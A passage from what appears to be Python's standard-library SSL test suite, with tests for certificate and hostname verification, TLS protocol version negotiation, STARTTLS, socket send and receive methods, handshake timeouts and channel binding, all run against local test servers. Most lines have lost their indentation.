'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
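        # The IDNA 2008 U-label entry above is left commented out: hostnames
        # are encoded with the stdlib "idna" codec, which implements IDNA 2003
        # and therefore would not produce the IDNA 2008 A-label expected here
        # (for example, it maps 'ß' to 'ss').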
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
        # TLS 1.3 has a different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
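        # Assumption behind this test: make_https_server() serves files from
        # the test's working directory, so requesting CERTFILE's basename over
        # HTTPS should return exactly the bytes read from the local file below.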
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
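            # sendto/recvfrom (and recvfrom_into) take an address argument,
            # which an SSL-wrapped socket rejects with a ValueError; that is
            # why expect_success is False for them in the tables above.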
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
            # Switch back to blocking mode and close; nothing is read back.
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
        # Issue #16357: accept() on an SSLSocket created through
        # SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # The client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
        # OpenSSL enables all TLS 1.3 ciphers; enforce TLS 1.2 for this test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
                # and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
